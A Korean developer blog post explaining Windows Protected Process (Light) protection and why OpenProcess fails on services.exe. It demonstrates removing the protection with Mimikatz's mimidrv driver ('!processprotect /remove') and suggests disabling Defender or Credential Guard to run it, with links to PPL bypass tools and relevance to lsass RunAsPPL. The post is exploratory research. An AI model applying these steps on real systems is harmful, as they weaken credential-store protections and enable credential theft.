Microsoft MVP성태의 닷넷 이야기
Windows: 212. 윈도우의 Protected Process (Light) 보안 [링크 복사], [링크+제목 복사]
조회: 4856
글쓴 사람
정성태 (techsharer at outlook.com)
홈페이지
첨부 파일
(연관된 글이 2개 있습니다.)

윈도우의 Protected Process (Light) 보안

10년도 넘은 시간이 흘러, 그 당시에는 다음의 코드가 service.exe에 대해 잘 실행됐는데,

다른 프로세스에 환경 변수 설정하는 방법 - 두 번째 이야기
; https://www.sysnet.pe.kr/2/0/1438

Reading the environment variables of another process
; https://stackoverflow.com/questions/37906715/reading-the-environment-variables-of-another-process

지금은 OpenProcess 호출에서 에러 코드 5, 즉 "Access is denied"를 반환합니다. 어떤 게 문제일까 싶어서 Process Explorer를 통해 확인했더니,

open_process_failed_1.png

"PsProtectedSignerWinTcb-Light"라는 문자열이 눈에 띄는군요. ^^ 다행히 검색해 보면 이에 대해 자세한 분석 글이 나옵니다.

Do You Really Know About LSA Protection (RunAsPPL)?
; https://itm4n.github.io/lsass-runasppl/

그러니까, EXE 파일을 마이크로소프트 측의 특별한 (Enhanced Key Usage에 추가 보안 목록이 있는) 인증서로 서명한 유형에 따라 PP(Protected Process)/PPL(Protected Process Light) 프로세스 취급을 받는데요, 이런 프로세스들은 일반 프로세스 권한으로는 설령 SE_DEBUG_NAME이 있다 해도 접근할 수 없습니다. (lsxxmanager.dll을 호스팅하는 svchost.exe도 그런 사례입니다.)

글쓴이는 이것을 우회하기 위해 "Known DLL" 등의 트릭도 써봤으나,

Bypassing LSA Protection in Userland
; https://blog.scrt.ch/2021/04/22/bypassing-lsa-protection-in-userland/

itm4n/PPLdump
; https://github.com/itm4n/PPLdump

Windows 10 21H2 버전부터는 저것도 막혔다고 합니다. 따라서 남은 방법은, 1) 보안을 우회할 커널 드라이버를 만들거나, 2) 간혹 Anti-Virus 프로그램 등에서 만든 커널 드라이버 중 PPL 프로세스의 핸들을 열고 있는 것을 찾아내 재사용하는 정도가 있습니다.

2가지 모두 공식적으로 쓸 만한 방법은 아닙니다.

그래도 위의 방법 중 1번에 대한 테스트를 해볼까요? 이를 위해 Mimikatz를 다운로드하는데, 유의할 점은 Windows 11에서는 이것을 바이러스로 인식하기 때문에 Windows Defender에 의해 실행 자체가 되지 않습니다.

따라서 실습하려면 Windows Server 2022 등의 다른 운영체제가 있어야 합니다. (혹은 Windows 11의 Defender 기능을 끕니다.) 그에 더해 다음과 같이 간단하게 OpenProcess API를 호출하는 프로그램을 작성하고,

#include <iostream>
#include <windows.h>
#include <tchar.h>

BOOL sm_EnableTokenPrivilege(LPCTSTR pszPrivilege)
{
    // ...[생략: https://github.com/hostilefork/titlewait/blob/master/src/NTProcessInfo.cpp#L34]...
}

int _tmain(int argc, TCHAR* argv[])
{
    TCHAR* app;
    DWORD    pid;
    HANDLE  proc;

    if (argc != 2) {
        app = _tcsrchr(argv[0], '\\');
        _tprintf(TEXT("Usage: %s [PID]\n"), app ? ++app : argv[0]);
        return -1;
    }

    _stscanf_s(argv[1], TEXT("%lu"), &pid);
    
    sm_EnableTokenPrivilege(SE_DEBUG_NAME);

    if (!(proc = OpenProcess(PROCESS_QUERY_INFORMATION /* | PROCESS_VM_READ | PROCESS_VM_WRITE */, FALSE, pid))) {
        DWORD dwError = ::GetLastError();
        printf("OpenProcess: not worked!, %d", dwError);
        return dwError;
    }

    printf("OpenProcess: worked!\n");

    CloseHandle(proc);
}

services.exe PID에 대해 관리자 권한으로 다음과 같이 실행해 보면,

// services.exe의 PID == 652인 경우,

c:\temp> ConsoleApplication1.exe 652
OpenProcess: not worked!, 5

이렇게 동작하지 않습니다. 반면, Mimikatz는 mimidrv.sys 커널 드라이버를 제공하고 있는데요, 그 모듈에 PP/PPL 보안을 무력화하는 코드가 들어 있습니다. 실제로 다음과 같이 명령을 내리면,

c:\temp> mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz # !processprotect /process:services.exe /remove
Process : services.exe
PID 652 -> 00/00 [0-0-0]

아래와 같이 OpenProcess가 잘 동작합니다.

// services.exe의 PID == 652인 경우,

c:\temp> ConsoleApplication1.exe 652
OpenProcess: worked!

이후, 다시 보호를 하면,

mimikatz # !processprotect /process:services.exe

OpenProcess는 더 이상 동작하지 않습니다. OpenProcess가 안 되니, 이후의 DLL Injection 등은 시도조차 할 수 없게 되었습니다.




참고로, OpenProcess의 모든 호출이 실패하는 것은 아닙니다. PROCESS_QUERY_LIMITED_INFORMATION, PROCESS_SET_LIMITED_INFORMATION, PROCESS_TERMINATE, PROCESS_SUSPEND_RESUME에 대해서는 가능합니다.

또한, Windows 11과 Server Server 2022의 보안 정책이 다소 다른 듯합니다. 일례로 Process Explorer의 경우 Windows 11 환경에서는 PP/PPL 보안이 적용된 프로세스에 대해서는 환경 변수 목록을 가져오지 못합니다. 반면 Windows Server 2022의 경우에는 해당 정보를 가져오는 데에는 문제가 없습니다.

현재 마이크로소프트는 Windows 11의 경우 wininit.exe, csrss.exe, smss.exe 및 Windows Defender 같은 프로세스(msmpeng.exe) 등의 극히 제한적인 범위로 PP/PPL 보안을 적용하고 있습니다. 그런데 본문의 경우, RunAsPPL 레지스트리 설정을 추가한 상황으로 설명하고 있습니다. 그래서 원래 lsass.exe는 PPL 프로세스가 아니지만 RunAsPPL 설정을 하면 PPL로 뜨는 것 같습니다. 그런 탓에 mimikatz가 Windows 11에서도 여전히 기본 명령어로도 잘 동작하지만 RunAsPPL로 lsass.exe가 보호받는 경우에는 (mimidrv.sys에서 제공하는) processprotect 명령어를 이용해 PPL 플래그를 제거하는 단계를 거쳐야 합니다.

이걸 테스트하려면 RunAsPPL 설정과 함께 재부팅도 해야 하고, mimikatz 바이러스 인식을 막기 위해 Windows Defender Credential Guard를 꺼야 하는데,

Disable Windows Defender Credential Guard
; https://learn.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage#disable-windows-defender-credential-guard

굳이 해볼 가치는 없어 보여 생략합니다. ^^




[이 글에 대해서 여러분들과 의견을 공유하고 싶습니다. 틀리거나 미흡한 부분 또는 의문 사항이 있으시면 언제든 댓글 남겨주십시오.]

[연관 글]






[최초 등록일: ]
[최종 수정일: 2/10/2023]

Creative Commons License
이 저작물은 크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이센스에 따라 이용하실 수 있습니다.
by SeongTae Jeong, mailto:techsharer at outlook.com

비밀번호

댓글 작성자
 



2022-11-23 11시01분
검색해 보니 좋은 자료가 있군요. ^^

PPL 우회 공격 연구 - 중부대학교
; http://isweb.joongbu.ac.kr/~jbuis/2019/report-2019-1.pdf
정성태

1  2  3  4  5  6  7  8  9  10  11  12  [13]  14  15  ...
NoWriterDateCnt.TitleFile(s)
13262정성태2/15/20234297디버깅 기술: 191. dnSpy를 이용한 (소스 코드가 없는) 닷넷 응용 프로그램 디버깅 방법 [1]
13261정성태2/15/20233504Windows: 224. Visual Studio - 영문 폰트가 Fullwidth Latin Character로 바뀌는 문제
13260정성태2/14/20233375오류 유형: 847. ilasm.exe 컴파일 오류 - error : syntax error at token '-' in ... -inf
13259정성태2/14/20233486.NET Framework: 2095. C# - .NET5부터 도입된 CollectionsMarshal
13258정성태2/13/20233366오류 유형: 846. .NET Framework 4.8 Developer Pack 설치 실패 - 0x81f40001
13257정성태2/13/20233472.NET Framework: 2094. C# - Job에 Process 포함하는 방법 [1]파일 다운로드1
13256정성태2/10/20234294개발 환경 구성: 665. WSL 2의 네트워크 통신 방법 - 두 번째 이야기
13255정성태2/10/20233637오류 유형: 845. gihub - windows2022 이미지에서 .NET Framework 4.5.2 미만의 프로젝트에 대한 빌드 오류
13254정성태2/10/20233516Windows: 223. (WMI 쿼리를 위한) PowerShell 문자열 escape 처리
13253정성태2/9/20234158Windows: 222. C# - 다른 윈도우 프로그램이 실행되었음을 인식하는 방법파일 다운로드1
13252정성태2/9/20233157오류 유형: 844. ssh로 명령어 수행 시 멈춤 현상
13251정성태2/8/20233593스크립트: 44. 파이썬의 3가지 스레드 ID
13250정성태2/8/20235410오류 유형: 843. System.InvalidOperationException - Unable to configure HTTPS endpoint
13249정성태2/7/20234072오류 유형: 842. 리눅스 - You must wait longer to change your password
13248정성태2/7/20233391오류 유형: 841. 리눅스 - [사용자 계정] is not in the sudoers file. This incident will be reported.
13247정성태2/7/20234241VS.NET IDE: 180. Visual Studio - 닷넷 소스 코드 디버깅 중 "Decompile source code"가 동작하는 않는 문제
13246정성태2/6/20233371개발 환경 구성: 664. Hyper-V에 설치한 리눅스 VM의 VHD 크기 늘리는 방법 - 두 번째 이야기
13245정성태2/6/20233835.NET Framework: 2093. C# - PEM 파일을 이용한 RSA 개인키/공개키 설정 방법파일 다운로드1
13244정성태2/5/20233321VS.NET IDE: 179. Visual Studio - External Tools에 Shell 내장 명령어 등록
13243정성태2/5/20234110디버깅 기술: 190. windbg - Win32 API 호출 시점에 BP 거는 방법 [1]
13242정성태2/4/20233526디버깅 기술: 189. ASP.NET Web Application (.NET Framework) 프로젝트의 숨겨진 예외 - System.UnauthorizedAccessException
13241정성태2/3/20233164디버깅 기술: 188. ASP.NET Web Application (.NET Framework) 프로젝트의 숨겨진 예외 - System.IO.FileNotFoundException
13240정성태2/1/20233305디버깅 기술: 187. ASP.NET Web Application (.NET Framework) 프로젝트의 숨겨진 예외 - System.Web.HttpException
13239정성태2/1/20232958디버깅 기술: 186. C# - CacheDependency의 숨겨진 예외 - System.Web.HttpException
13238정성태1/31/20234773.NET Framework: 2092. IIS 웹 사이트를 TLS 1.2 또는 TLS 1.3 프로토콜로만 운영하는 방법
13237정성태1/30/20234409.NET Framework: 2091. C# - 웹 사이트가 어떤 버전의 TLS/SSL을 지원하는지 확인하는 방법
1  2  3  4  5  6  7  8  9  10  11  12  [13]  14  15  ...